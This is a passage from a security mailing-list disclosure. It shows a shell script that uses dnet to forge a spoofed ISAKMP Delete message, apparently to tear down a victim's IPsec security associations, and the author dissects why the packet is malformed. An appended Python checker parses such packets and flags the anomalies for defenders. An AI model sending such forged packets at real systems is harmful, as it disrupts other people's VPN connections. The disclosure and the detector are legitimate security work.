in my last posting. A slightly modified attack still succeeds:
attacker# cat we_have_been_auditing_since_the_summer_of_1996¹
#!/bin/sh
if [ ! $# -eq 3 ]; then
echo "usage: $0 fake_src victim spi";
exit;
fi
src=$1; dst=$2
spi=`echo $3 | sed 's/\(..\)/\\\\x\1/g'`
cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null`
dnet hex $cky_i "\x00\x00\x00\x00\x00\x00\x00\x00" "\x08\x10\x05\x00" "\x00\x00\x00\x00" "\x00\x00\x00\x5c" "\x01\x00\x00\x04" "\x0c\x00\x00\x2c" "\x00\x00\x00\x01" "\x00\x00\x00\x01" "\x00\x00\x00\x20" "\x01\x01\x00\x01" "\x00\x00\x00\x18" "\x00\x01\x00\x00" "\x80\x01\x00\x05" "\x80\x02\x00\x02" "\x80\x03\x00\x01" "\x80\x04\x00\x02" "\x00\x00\x00\x10" "\x00\x00\x00\x01" "\x03\x04\x00\x01" $spi |
dnet udp sport 500 dport 500 |
dnet ip proto udp src $src dst $dst |
dnet send
"Let him who have understanding reckon the" nonsense of this packet:
It's a message in an informational exchange with responder cookie and
message ID zero containing a hash payload of effective length zero, a SA
and a delete payload. That's an ambitious candidate for the Museum of
Broken Packets ;-).
Thomas Walpuski
1 - http://openbsd.org/security.html#process
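A defender-side check for the packet dissected in the post, added here as an example (not the author's script): it parses the ISAKMP header and generic payload chain and reports the properties called out above. The sample bytes are reconstructed from the posted dnet command with a placeholder initiator cookie and a placeholder ESP SPI (0xdeadbeef).

```python
import struct
EXCH_INFORMATIONAL, PAYLOAD_SA, PAYLOAD_HASH, PAYLOAD_DELETE = 5, 1, 8, 12  # RFC 2408 values

# Constructed sample: the spoofed message from the posted script, with a placeholder
# initiator cookie and a placeholder ESP SPI (0xdeadbeef) in place of live values.
SAMPLE = (
    b"\x11\x22\x33\x44\x55\x66\x77\x88" + b"\x00" * 8   # initiator cookie, zero responder cookie
    + b"\x08\x10\x05\x00" + b"\x00" * 4 + b"\x00\x00\x00\x5c"  # next=HASH, v1.0, INFO, msg ID 0, len 92
    + b"\x01\x00\x00\x04"                                # HASH payload: next=SA, len 4 (no digest)
    + b"\x0c\x00\x00\x2c" + b"\x00\x00\x00\x01" * 2       # SA payload: next=DELETE, len 44, DOI/SIT
    + b"\x00\x00\x00\x20\x01\x01\x00\x01"                 #  proposal 1, proto ISAKMP, 1 transform
    + b"\x00\x00\x00\x18\x00\x01\x00\x00"                 #  transform KEY_IKE
    + b"\x80\x01\x00\x05\x80\x02\x00\x02\x80\x03\x00\x01\x80\x04\x00\x02"  # 3DES/SHA/PSK/group 2
    + b"\x00\x00\x00\x10\x00\x00\x00\x01\x03\x04\x00\x01\xde\xad\xbe\xef"  # DELETE: ESP, one SPI
)

def parse_isakmp(data):
    # Returns (header dict, [(payload_type, body_bytes), ...]); raises ValueError on malformed input.
    if len(data) < 28:
        raise ValueError("short ISAKMP header")
    cky_i, cky_r, nxt, ver, exch, flags, msg_id, length = struct.unpack("!8s8sBBBBII", data[:28])
    if length != len(data):
        raise ValueError("length field %d != datagram length %d" % (length, len(data)))
    hdr = dict(cky_i=cky_i, cky_r=cky_r, version=ver, exch=exch, flags=flags, msg_id=msg_id)
    payloads, off = [], 28
    while nxt != 0:  # walk the generic payload chain until next-payload == NONE
        if off + 4 > len(data):
            raise ValueError("truncated payload header at offset %d" % off)
        pnext, _reserved, plen = struct.unpack("!BBH", data[off:off + 4])
        if plen < 4 or off + plen > len(data):
            raise ValueError("bad payload length %d at offset %d" % (plen, off))
        payloads.append((nxt, data[off + 4:off + plen]))
        nxt, off = pnext, off + plen
    return hdr, payloads

def audit(data):
    # Flags the oddities the post points out; an empty list means none of them were seen.
    hdr, payloads = parse_isakmp(data)
    types = [t for t, _ in payloads]
    findings = []
    if hdr["exch"] == EXCH_INFORMATIONAL and hdr["cky_r"] == b"\x00" * 8:
        findings.append("informational exchange with zero responder cookie")
    if hdr["exch"] == EXCH_INFORMATIONAL and hdr["msg_id"] == 0:
        findings.append("informational exchange with message ID zero")
    if any(t == PAYLOAD_HASH and not body for t, body in payloads):
        findings.append("hash payload with zero-length body")
    if PAYLOAD_DELETE in types and PAYLOAD_SA in types:
        findings.append("delete payload combined with SA payload")
    return findings
```

Run against UDP/500 captures, a non-empty result from audit() is a reasonable trigger for dropping the datagram or raising an alert before it reaches the IKE daemon.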